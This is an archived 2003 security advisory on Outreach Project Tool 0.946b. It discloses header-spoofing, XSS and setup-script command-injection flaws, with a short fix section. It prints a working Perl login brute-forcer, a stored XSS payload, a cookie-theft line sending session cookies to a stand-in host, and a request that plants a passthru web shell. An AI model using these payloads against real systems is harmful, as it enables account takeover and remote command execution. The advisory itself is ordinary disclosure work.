20th Jan 2003 [SBWID-5935]
COMMAND
Outreach Project Tool issues
SYSTEMS AFFECTED
O.P.T Version opt_0.946b / Earlier versions may be vulnerable too
PROBLEM
In an advisory by Martin Eiszner [mei@websec.org] of WebSec.org
[http://www.websec.org] :
The Outreach Project Tool was developed by CSO Lanifex GmbH to support
communication with customers during project implementat ion. It has
rapidly evolved into a highly effective Web-based collaboration system,
which improves interaction between consult ants and their clients, as
well as a wide range of other applications.
--snip--
1) REQUEST-HEADER TARPIT - OUT-CHEAT
The function "OPT_remote_IP()"(/opt/general.php) accepts
"X_FORWARDED_FOR" and "VIA"- environment variables.
This is done to identify possible proxy-servers. Unfortunately these
variables are part of the HTTP-request headers.
the follwoing http-request:
---*---
GET /opt/whatever HTTP/1.1
Host: whatever
VIA: 1.2.3.4
---*---
"$HTTP_VIA" will be used as the users IP.
Thus leading to:
-Anonymous use of the application
-Possibility of a brute-force attack against accounts
Simple example for a brute-force attack against OPT:
---cut here---
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){ my $pwd = $_; chomp($pwd);
my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
my $hds = $res->headers; my $new = $hds->header("Location");
my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
my $cod = $res2->code;
my $pag = $res2->content;
print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
close (P);
---cut here---
2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others
Typical XSS vulnerabilities exist in manny/most of the
community-functions.
Example:
Once logged in ... goto "Notes -> News -> Ad News" Then create a News
with scripting tags included:
---cut here---
hello i am a news thing .. bla bla ...
<script> alert(document.cookie); </script>
---cut here---
Now every user gets now an alert window with his own session-id.(only
as example!!)
Of course it is possible to steal the OPT_Session by requesting another
url where a so called cookie-theft is installed !!
(location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)
This vulnerability makes it possible once logged in to steal "any"
other users accounts (administrator included !).
3) SETUP-ISSUES (/opt/setup)
If the lockfile "lock01" in the setup_lock-directory is not removed due
to wrong permission settings or someone is able/allowed to create a
file "lock01" it is possible to:
a) Create a new Setup
b) Execute system-commands thru the setup.php - script.
This is because the "temp_CRM_dir" parameter is passed directly to the
PHP-exec function.
Example GET-Request:
---cut here---
http://localhost/opt/setup/setup.php?
CRM_email=opti@localhost
&CRM_system_email=mei@localhost
&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
&CRM_db_host=localhost&CRM_db_uname=opt
&CRM_db_pwd=opt
&CRM_db_db=opt
&CRM_may_demo=0
&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
&CRM_mail_fname=OPT_incoming_mail
&action=Set up my OPT server
---cut here---
Above will create a script called "bad.php" with
content(<?passthru($c)?>)in the OPT-setup directory !
SOLUTION
After installation check if file "lock01" exists in
setup_lock-directory. if yes, remove it.
The other vulnerabilities can only be fixed by sw-patches. (?)
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
